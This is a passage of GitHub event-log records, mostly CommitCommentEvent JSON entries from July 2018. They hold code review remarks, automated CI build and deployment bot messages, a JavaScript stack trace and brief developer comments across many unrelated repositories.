|   |   |   |   |   |   | 74 | 11 | 15 | 2 | 0 | 0 | 77 | 30 | 37 | 5 | 4 | 0 | 0 | 78\r\n...\r\n1500 lines later\r\n...\r\nT.Wragge | 00-0021064 | yes | STL |   |   |   |   |   |   | 0 | 0 | 1 | 0 | -8 |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |  \r\n-- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | --\r\nC.Jones | 00-0028128 | no | SF | DB |   |   |   |   |   | 0 | 1 | 0 | 1 | 0 |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |  \r\nM.Green | 00-0027353 | yes | ARI |   | 0 | 0 | 0 | 0 | 1 |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |  \r\n\r\n```\r\n\r\n"}},"created_at":"2018-07-12T12:04:19Z"}
{"id":"7955796504","type":"CommitCommentEvent","actor":{"login":"mangodevelopments"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29684238,"position":null,"line":null,"path":null,"commit_id":"03a10fa55c9265064b4463d76a5f644cf714ce7d","created_at":"2018-07-12T12:04:58Z","updated_at":"2018-07-12T12:04:58Z","author_association":"CONTRIBUTOR","body":"changes made , how do i get them evaluated thanks "}},"created_at":"2018-07-12T12:04:58Z"}
{"id":"7955796744","type":"CommitCommentEvent","actor":{"login":"xavierba"},"repo":{"name":"xavierba/OpenARC"},"payload":{"comment":{"id":29684239,"position":null,"line":null,"path":null,"commit_id":"6e88316f580fb4d64147f108574a4b4363c8fce6","created_at":"2018-07-12T12:05:01Z","updated_at":"2018-07-12T12:05:01Z","author_association":"OWNER","body":"@mdomsch, and in this one too.\r\nWill you submit this for a Fedora review ?"}},"created_at":"2018-07-12T12:05:01Z"}
{"id":"7955802768","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684249,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-12T12:06:16Z","updated_at":"2018-07-12T12:06:16Z","author_association":"NONE","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T12:06:16Z"}
{"id":"7955809175","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29684272,"position":13,"line":135,"path":"src/Umbraco.Web.UI.Client/src/common/directives/components/content/edit.controller.js","commit_id":"e7fce9120e09b980e84ce3495fc98c38b4e4d342","created_at":"2018-07-12T12:07:40Z","updated_at":"2018-07-12T12:07:40Z","author_association":"MEMBER","body":"@lars-erik do you want this to occur before the client side validation or after? as this is now, this is happening before the client side validation"}},"created_at":"2018-07-12T12:07:40Z"}
{"id":"7955809560","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684273,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T12:07:46Z","updated_at":"2018-07-12T12:07:46Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T12:07:46Z"}
{"id":"7955810454","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684276,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-12T12:07:58Z","updated_at":"2018-07-12T12:07:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T12:07:58Z"}
{"id":"7955813529","type":"CommitCommentEvent","actor":{"login":"mishuvs"},"repo":{"name":"mishuvs/open-event-server"},"payload":{"comment":{"id":29684281,"position":22,"line":22,"path":"app/api/schema/events_orga.py","commit_id":"26ad931ec21f1254c25c980639242276b1ce07af","created_at":"2018-07-12T12:08:39Z","updated_at":"2018-07-12T12:08:39Z","author_association":"OWNER","body":"I need to convert these three functions into ORM type things so that it doesn't slow the server."}},"created_at":"2018-07-12T12:08:39Z"}
{"id":"7955816573","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29684289,"position":null,"line":null,"path":null,"commit_id":"a21e675b93eea74f2f233061502aa5de5e32118c","created_at":"2018-07-12T12:09:19Z","updated_at":"2018-07-12T12:09:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-120917 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-120917\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T12:09:19Z"}
{"id":"7955817222","type":"CommitCommentEvent","actor":{"login":"Vincent43"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29684291,"position":null,"line":null,"path":null,"commit_id":"6108f459e375151e95bedf7090eb9b84169479e8","created_at":"2018-07-12T12:09:27Z","updated_at":"2018-07-12T12:09:27Z","author_association":"COLLABORATOR","body":"I'm not sure if this is good addition here. Keep in mind this isn't overrideable per app profile. Generally we shouldn't duplicate things which are supported in firejail directly. https://github.com/netblue30/firejail/commit/bdd4b026c4bb6a5d3c671574ab63c8e438d886ac is more appropriate way."}},"created_at":"2018-07-12T12:09:27Z"}
{"id":"7955818938","type":"CommitCommentEvent","actor":{"login":"channeladam"},"repo":{"name":"channeladam/test-pages"},"payload":{"comment":{"id":29684294,"position":null,"line":null,"path":null,"commit_id":"f1c0b1e3fe7506ce2542b2ea782a77b567523e2c","created_at":"2018-07-12T12:09:49Z","updated_at":"2018-07-12T12:09:49Z","author_association":"OWNER","body":"Created CNAME file"}},"created_at":"2018-07-12T12:09:49Z"}
{"id":"7955821061","type":"CommitCommentEvent","actor":{"login":"Zoilken"},"repo":{"name":"theriley106/Nightchord"},"payload":{"comment":{"id":29684301,"position":null,"line":null,"path":null,"commit_id":"89f3af38efc7da27b33d5d38df3c777e986a6588","created_at":"2018-07-12T12:10:17Z","updated_at":"2018-07-12T12:10:17Z","author_association":"NONE","body":"Can you pls make a fast example of use on Readme? "}},"created_at":"2018-07-12T12:10:17Z"}
{"id":"7955823733","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/oommfc-feedstock"},"payload":{"comment":{"id":29684304,"position":null,"line":null,"path":null,"commit_id":"71bba40f3f8309ee48b6d71ad51f2e20fced4461","created_at":"2018-07-12T12:10:51Z","updated_at":"2018-07-12T12:10:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-12T12:10:51Z"}
{"id":"7955833819","type":"CommitCommentEvent","actor":{"login":"Feliix42"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":29684319,"position":null,"line":null,"path":null,"commit_id":"c0cf48c2eb332b6aff55867dd25305446fc6e77b","created_at":"2018-07-12T12:13:00Z","updated_at":"2018-07-12T12:13:00Z","author_association":"MEMBER","body":"🎉 "}},"created_at":"2018-07-12T12:13:00Z"}
{"id":"7955845856","type":"CommitCommentEvent","actor":{"login":"lars-erik"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29684346,"position":13,"line":135,"path":"src/Umbraco.Web.UI.Client/src/common/directives/components/content/edit.controller.js","commit_id":"e7fce9120e09b980e84ce3495fc98c38b4e4d342","created_at":"2018-07-12T12:15:35Z","updated_at":"2018-07-12T12:15:35Z","author_association":"CONTRIBUTOR","body":"I guess before is good, as it leaves an opportunity to \"fix\" invalid data as well."}},"created_at":"2018-07-12T12:15:35Z"}
{"id":"7955850851","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29684361,"position":null,"line":null,"path":null,"commit_id":"cc5dae7a21bf8218087aaea0266653ebbba17121","created_at":"2018-07-12T12:16:36Z","updated_at":"2018-07-12T12:16:36Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-121634 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-121634\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T12:16:36Z"}
{"id":"7955851327","type":"CommitCommentEvent","actor":{"login":"AzawStephens"},"repo":{"name":"AzawStephens/MoviesAppStageOne"},"payload":{"comment":{"id":29684362,"position":2,"line":2,"path":"README.md","commit_id":"084bb7d298ef52b8e6a4b8dc65228e2bf49bb056","created_at":"2018-07-12T12:16:41Z","updated_at":"2018-07-12T12:16:41Z","author_association":"OWNER","body":"And I'm attempting to use the VIews class to create my views and such. "}},"created_at":"2018-07-12T12:16:41Z"}
{"id":"7955852286","type":"CommitCommentEvent","actor":{"login":"oalbacha"},"repo":{"name":"PeteEdgerton/CallCentreProject"},"payload":{"comment":{"id":29684365,"position":null,"line":null,"path":null,"commit_id":"239da2e3d5c5ebd1556c41934da16372007fcc62","created_at":"2018-07-12T12:16:52Z","updated_at":"2018-07-12T12:16:52Z","author_association":"COLLABORATOR","body":"👍😄 "}},"created_at":"2018-07-12T12:16:52Z"}
{"id":"7955852505","type":"CommitCommentEvent","actor":{"login":"horaciovasconcellos"},"repo":{"name":"horaciovasconcellos/scriptsPLSQL"},"payload":{"comment":{"id":29684366,"position":null,"line":null,"path":null,"commit_id":"34c1b57894fe7bd69cda2a3c11da79b9ae9f2476","created_at":"2018-07-12T12:16:55Z","updated_at":"2018-07-12T12:16:55Z","author_association":"OWNER","body":"dd"}},"created_at":"2018-07-12T12:16:55Z"}
{"id":"7955852801","type":"CommitCommentEvent","actor":{"login":"horaciovasconcellos"},"repo":{"name":"horaciovasconcellos/scriptsPLSQL"},"payload":{"comment":{"id":29684367,"position":null,"line":null,"path":null,"commit_id":"34c1b57894fe7bd69cda2a3c11da79b9ae9f2476","created_at":"2018-07-12T12:16:59Z","updated_at":"2018-07-12T12:16:59Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-12T12:16:59Z"}
{"id":"7955857219","type":"CommitCommentEvent","actor":{"login":"goto-bus-stop"},"repo":{"name":"transloadit/uppy"},"payload":{"comment":{"id":29684372,"position":5,"line":5,"path":"website/src/_posts/2018-07-0.26.md","commit_id":"95f75f4e82c4dacf544b977d65431bd2fe2654e3","created_at":"2018-07-12T12:17:50Z","updated_at":"2018-07-12T12:17:50Z","author_association":"MEMBER","body":"ups, that's not right. wonder if there would be a good image for this at all or if we should just not have one?"}},"created_at":"2018-07-12T12:17:50Z"}
{"id":"7955859663","type":"CommitCommentEvent","actor":{"login":"pjanouse"},"repo":{"name":"olivergondza/node-sharing-plugin"},"payload":{"comment":{"id":29684376,"position":41,"line":203,"path":"plugin/src/main/java/com/redhat/jenkins/nodesharingfrontend/Api.java","commit_id":"c54e0103250267d061bc899609f5aad054eeef4c","created_at":"2018-07-12T12:18:22Z","updated_at":"2018-07-12T12:18:22Z","author_association":"NONE","body":"Shouldn't be here 'node != null'?\r\n\r\ngetCollidingNode(jenkins, name) return a Node when it is (not isn't) found otherwise returns null (line 252)."}},"created_at":"2018-07-12T12:18:22Z"}
{"id":"7955861820","type":"CommitCommentEvent","actor":{"login":"JRunix"},"repo":{"name":"JRunix/EduForge"},"payload":{"comment":{"id":29684391,"position":null,"line":null,"path":null,"commit_id":"8c3eb21116cd3610dd4c486ecd48e75e344f7eec","created_at":"2018-07-12T12:18:49Z","updated_at":"2018-07-12T12:18:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Configure project](https://trello.com/c/IIF63Vhe/2-configure-project)"}},"created_at":"2018-07-12T12:18:49Z"}
{"id":"7955863530","type":"CommitCommentEvent","actor":{"login":"Nastya-Kruglikova"},"repo":{"name":"Nastya-Kruglikova/cool_tasks"},"payload":{"comment":{"id":29684394,"position":27,"line":71,"path":"src/models/restaurants.go","commit_id":"5aab4efab0dc3c88d2986b07d1a7c21b73cff498","created_at":"2018-07-12T12:19:11Z","updated_at":"2018-07-12T12:19:11Z","author_association":"OWNER","body":"why log Fatal? \r\nFatal will close app. App should not be closed because of one request failure !"}},"created_at":"2018-07-12T12:19:11Z"}
{"id":"7955863779","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684396,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-12T12:19:14Z","updated_at":"2018-07-12T12:19:14Z","author_association":"NONE","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T12:19:14Z"}
{"id":"7955881622","type":"CommitCommentEvent","actor":{"login":"AlexanderBrese"},"repo":{"name":"AlexanderBrese/vuetify-js-webpack-stylus"},"payload":{"comment":{"id":29684441,"position":69,"line":69,"path":"build/utils.js","commit_id":"1b0f25c50dd9f34f8739ad0e57f93e0226989cbe","created_at":"2018-07-12T12:23:00Z","updated_at":"2018-07-12T12:23:00Z","author_association":"OWNER","body":"Changed."}},"created_at":"2018-07-12T12:23:00Z"}
{"id":"7955882047","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"marcosci/landscapemetrics"},"payload":{"comment":{"id":29684443,"position":null,"line":null,"path":null,"commit_id":"fd66f786f9a955229e2bf7698effabddb607ccde","created_at":"2018-07-12T12:23:05Z","updated_at":"2018-07-12T12:23:05Z","author_association":"COLLABORATOR","body":"@mhesselbarth Have you thought about creating a data.frame with abbreviations and full names of the metrics? Then users can perform their calculations, and next `left_join()` the output with this new table (if they do not know abbreviations very well)."}},"created_at":"2018-07-12T12:23:05Z"}
{"id":"7955883263","type":"CommitCommentEvent","actor":{"login":"mEyob"},"repo":{"name":"mEyob/5G-hetnet-journal-extension"},"payload":{"comment":{"id":29684447,"position":6,"line":71,"path":"configurations.txt","commit_id":"b16eef5a45e69a58c451e80d941648a7bd5d46e0","created_at":"2018-07-12T12:23:21Z","updated_at":"2018-07-12T12:23:21Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-12T12:23:21Z"}
{"id":"7955913777","type":"CommitCommentEvent","actor":{"login":"Nastya-Kruglikova"},"repo":{"name":"Nastya-Kruglikova/cool_tasks"},"payload":{"comment":{"id":29684491,"position":5,"line":15,"path":"src/config.json","commit_id":"02dac2bfbceb9161daa4a0cbf7fe00556457e164","created_at":"2018-07-12T12:29:27Z","updated_at":"2018-07-12T12:29:27Z","author_association":"OWNER","body":"?"}},"created_at":"2018-07-12T12:29:27Z"}
{"id":"7955919949","type":"CommitCommentEvent","actor":{"login":"daehn"},"repo":{"name":"wireapp/wire-ios"},"payload":{"comment":{"id":29684505,"position":26,"line":54,"path":"Wire-iOS/Sources/UserInterface/ConversationList/ConversationListViewController+DataUsagePermissions.swift","commit_id":"65df3c745dbe8f2b49385fd09ae8a4a6fa7966ca","created_at":"2018-07-12T12:30:38Z","updated_at":"2018-07-12T12:30:38Z","author_association":"CONTRIBUTOR","body":"Is `TrackingManager.shared.disableCrashAndAnalyticsSharing ` an optional?"}},"created_at":"2018-07-12T12:30:38Z"}
{"id":"7955920074","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29684506,"position":null,"line":null,"path":null,"commit_id":"ba9e785abd66f9667a43f5a016723fe97bba692a","created_at":"2018-07-12T12:30:40Z","updated_at":"2018-07-12T12:30:40Z","author_association":"OWNER","body":"promises allow us to manage async task\r\nthey accept one function which in turn accepts two more functions, one is success and another is failure\r\nif the promise succeeds in executing the function, it returns success function which can be chained using '.then()' as shown above, however, if it fails by any means, it executes the failure function which can be catched using the 'catch()' as shown above."}},"created_at":"2018-07-12T12:30:40Z"}
{"id":"7955921637","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/products"},"payload":{"comment":{"id":29684507,"position":null,"line":null,"path":null,"commit_id":"7bc9514f4c443e96c94507ab9c72de1aa4fb95ba","created_at":"2018-07-12T12:30:57Z","updated_at":"2018-07-12T12:30:57Z","author_association":"OWNER","body":"WOW"}},"created_at":"2018-07-12T12:30:57Z"}
{"id":"7955922321","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/products"},"payload":{"comment":{"id":29684508,"position":null,"line":null,"path":null,"commit_id":"7bc9514f4c443e96c94507ab9c72de1aa4fb95ba","created_at":"2018-07-12T12:31:05Z","updated_at":"2018-07-12T12:31:05Z","author_association":"OWNER","body":"OMG"}},"created_at":"2018-07-12T12:31:05Z"}
{"id":"7955929661","type":"CommitCommentEvent","actor":{"login":"cirdeirf"},"repo":{"name":"fsr/nopanic"},"payload":{"comment":{"id":29684526,"position":null,"line":null,"path":null,"commit_id":"c0cf48c2eb332b6aff55867dd25305446fc6e77b","created_at":"2018-07-12T12:32:31Z","updated_at":"2018-07-12T12:32:31Z","author_association":"NONE","body":"kudos to @tobias-haenel "}},"created_at":"2018-07-12T12:32:31Z"}
{"id":"7955930539","type":"CommitCommentEvent","actor":{"login":"nad"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":29684530,"position":null,"line":null,"path":null,"commit_id":"18743484d0a0f01e068287fe50a465d8e0044699","created_at":"2018-07-12T12:32:42Z","updated_at":"2018-07-12T12:32:42Z","author_association":"CONTRIBUTOR","body":"There seems to be an issue for this now: #3154."}},"created_at":"2018-07-12T12:32:42Z"}
{"id":"7955938905","type":"CommitCommentEvent","actor":{"login":"PeopleMountain"},"repo":{"name":"PeopleMountain/desktop"},"payload":{"comment":{"id":29684549,"position":null,"line":null,"path":null,"commit_id":"1bc3acd5bdc2a7949153470256f052d2c16cba7e","created_at":"2018-07-12T12:34:20Z","updated_at":"2018-07-12T12:34:20Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-12T12:34:20Z"}
{"id":"7955945430","type":"CommitCommentEvent","actor":{"login":"strindhaug"},"repo":{"name":"zeppelin-no/ci-scripts"},"payload":{"comment":{"id":29684562,"position":13,"line":23,"path":"k8s/apply.sh","commit_id":"448ede2acb70b2128aea1d9d43193e003c06000c","created_at":"2018-07-12T12:35:33Z","updated_at":"2018-07-12T12:35:33Z","author_association":"CONTRIBUTOR","body":"WTF!? Why did he remove the namespace argument? No wonder my builds has not been working..."}},"created_at":"2018-07-12T12:35:33Z"}
{"id":"7955947037","type":"CommitCommentEvent","actor":{"login":"alexaubry"},"repo":{"name":"wireapp/wire-ios"},"payload":{"comment":{"id":29684568,"position":26,"line":54,"path":"Wire-iOS/Sources/UserInterface/ConversationList/ConversationListViewController+DataUsagePermissions.swift","commit_id":"65df3c745dbe8f2b49385fd09ae8a4a6fa7966ca","created_at":"2018-07-12T12:35:51Z","updated_at":"2018-07-12T12:35:51Z","author_association":"MEMBER","body":"It's not an optional. Why?"}},"created_at":"2018-07-12T12:35:51Z"}
{"id":"7955949038","type":"CommitCommentEvent","actor":{"login":"simosuu"},"repo":{"name":"simosuu/addons-infoterra"},"payload":{"comment":{"id":29684575,"position":null,"line":null,"path":null,"commit_id":"d96acfc556c6c07d8f65e3c0d7a309eb337b27d1","created_at":"2018-07-12T12:36:15Z","updated_at":"2018-07-12T12:36:15Z","author_association":"OWNER","body":"No help actually.\r\n\r\n"}},"created_at":"2018-07-12T12:36:15Z"}
{"id":"7955951754","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29684584,"position":12,"line":19,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/SearchingFlight.java","commit_id":"5c78520399b08b754706cb7f7bfa28f3866466ed","created_at":"2018-07-12T12:36:49Z","updated_at":"2018-07-12T12:36:49Z","author_association":"NONE","body":"Sprawdzenie powinno być dla konkretnego lotniska. Tzn sprawdzasz czy np Białystok istnieje na liście lotnisk i czy wartość boolean dla Białegostoku jest true"}},"created_at":"2018-07-12T12:36:49Z"}
{"id":"7955953142","type":"CommitCommentEvent","actor":{"login":"simosuu"},"repo":{"name":"simosuu/addons-infoterra"},"payload":{"comment":{"id":29684587,"position":null,"line":null,"path":null,"commit_id":"d96acfc556c6c07d8f65e3c0d7a309eb337b27d1","created_at":"2018-07-12T12:37:05Z","updated_at":"2018-07-12T12:37:05Z","author_association":"OWNER","body":"Issue is:\r\nhttp://localhost:8069/web/content/2806-66b7c73/web.assets_backend.js:2977\r\nVirheloki:\r\nTypeError: Cannot read property 'appendTo' of undefined\r\n    at Class.renderSidebar (http://localhost:8069/web/content/2806-66b7c73/web.assets_backend.js:2977:14)\r\n    at Class.render_view_control_elements (http://localhost:8069/web/content/2806-66b7c73/web.assets_backend.js:489:92)\r\n    at Class._display_view (http://localhost:8069/web/content/2806-66b7c73/web.assets_backend.js:483:266)\r\n    at Object.<anonymous> (http://localhost:8069/web/content/2806-66b7c73/web.assets_backend.js:482:49)\r\n    at Object.<anonymous> (http://localhost:8069/web/content/2413-4be4c01/web.assets_common.js:802:681)\r\n    at fire (http://localhost:8069/web/content/2413-4be4c01/web.assets_common.js:796:299)\r\n    at Object.fireWith [as resolveWith] (http://localhost:8069/web/content/2413-4be4c01/web.assets_common.js:801:198)\r\n    at Object.deferred.(anonymous function) [as resolve] (http://localhost:8069/web/content/2413-4be4c01/web.assets_common.js:803:56)\r\n    at http://localhost:8069/web/content/2806-66b7c73/web.assets_backend.js:481:373\r\n    at fire (http://localhost:8069/web/content/2413-4be4c01/web.assets_common.js:796:299)"}},"created_at":"2018-07-12T12:37:05Z"}
{"id":"7955956248","type":"CommitCommentEvent","actor":{"login":"mominul"},"repo":{"name":"Adyel/OpenBangla-Keyboard"},"payload":{"comment":{"id":29684593,"position":null,"line":null,"path":null,"commit_id":"cf331ed8b18dcb90b6149234f9fbe166ae1742e1","created_at":"2018-07-12T12:37:41Z","updated_at":"2018-07-12T12:37:41Z","author_association":"NONE","body":"This commit is a very big change. It would have been better if you had done formatting in another branch. It'd make the review process easier. What format tool you have used? The format functionality comes with QT Creator?"}},"created_at":"2018-07-12T12:37:41Z"}
{"id":"7955967807","type":"CommitCommentEvent","actor":{"login":"yuriteixeira"},"repo":{"name":"moisesber/dotfileconfig"},"payload":{"comment":{"id":29684626,"position":9,"line":24,"path":".vimrc_shortcuts","commit_id":"5bec6faa0c7e0195899f7e28aae122d446daae43","created_at":"2018-07-12T12:40:02Z","updated_at":"2018-07-12T12:40:02Z","author_association":"NONE","body":"22-24: Nice! I might add those too :D"}},"created_at":"2018-07-12T12:40:02Z"}
{"id":"7955969271","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29684629,"position":null,"line":null,"path":null,"commit_id":"c86faaab49b90daf54e44c41e3b635e79ddfe90d","created_at":"2018-07-12T12:40:19Z","updated_at":"2018-07-12T12:40:19Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-12T12:40:19Z"}
{"id":"7955973083","type":"CommitCommentEvent","actor":{"login":"mhesselbarth"},"repo":{"name":"marcosci/landscapemetrics"},"payload":{"comment":{"id":29684632,"position":null,"line":null,"path":null,"commit_id":"fd66f786f9a955229e2bf7698effabddb607ccde","created_at":"2018-07-12T12:41:04Z","updated_at":"2018-07-12T12:41:04Z","author_association":"COLLABORATOR","body":"That's a cool idea. @marcosci and I decided today that using the abbreviation is way more convenient for further filtering etc...But the dataframe idea is great! Will do this when I find some time! "}},"created_at":"2018-07-12T12:41:04Z"}
{"id":"7955973328","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684633,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T12:41:08Z","updated_at":"2018-07-12T12:41:08Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test 